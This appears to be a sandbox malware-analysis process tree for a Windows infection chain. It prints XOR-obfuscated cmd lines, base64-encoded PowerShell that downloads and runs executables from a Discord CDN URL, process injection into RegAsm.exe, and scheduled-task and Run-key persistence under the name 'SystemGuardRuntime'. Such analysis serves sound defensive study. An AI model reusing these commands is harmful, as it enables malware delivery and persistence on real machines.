C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6E^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x37^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x73^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x37^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x36^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x55^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x76^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6C^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x60^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x37^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x73^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x50^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x53^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6C^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x36^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x67^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x36^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x29^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x76^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6E^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x70^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6C^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x76^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x60^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x57^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x73^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x70^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Local\Temp\0.exe"C:\Users\Admin\AppData\Local\Temp\0.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\KTsJHXYseh.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\KTsJHXYseh.exeC:\Users\Admin\AppData\Local\Temp\KTsJHXYseh.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZABrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADAAMQAyADIAMwA2ADkAMAAzADQAMQAvAHAAbABsAG0AbQBkAGkAaQBwAG0ALgBlAHgAZQAnACwAIAA8ACMAeABjAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGoAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBHADMALgBlAHgAZQAnACkAKQA8ACMAZwByAHkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB1AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAcABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcAMwAuAGUAeABlACcAKQA8ACMAdwBrAGsAIwA+AA=="5⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exe"C:\Users\Admin\AppData\Roaming\JDSG3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\gKHZUfqcLT.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\gKHZUfqcLT.exeC:\Users\Admin\AppData\Local\Temp\gKHZUfqcLT.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAawBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADEANAAwADEANgAzADEANwA1ADEAMwAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHcAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAZABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcANAAuAGUAeABlACcAKQApADwAIwBuAHEAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABqAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARwA0AC4AZQB4AGUAJwApADwAIwB5AHUAZQAjAD4A"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\JDSG4.exe"C:\Users\Admin\AppData\Roaming\JDSG4.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\EcS04le5nj.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\EcS04le5nj.exeC:\Users\Admin\AppData\Local\Temp\EcS04le5nj.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
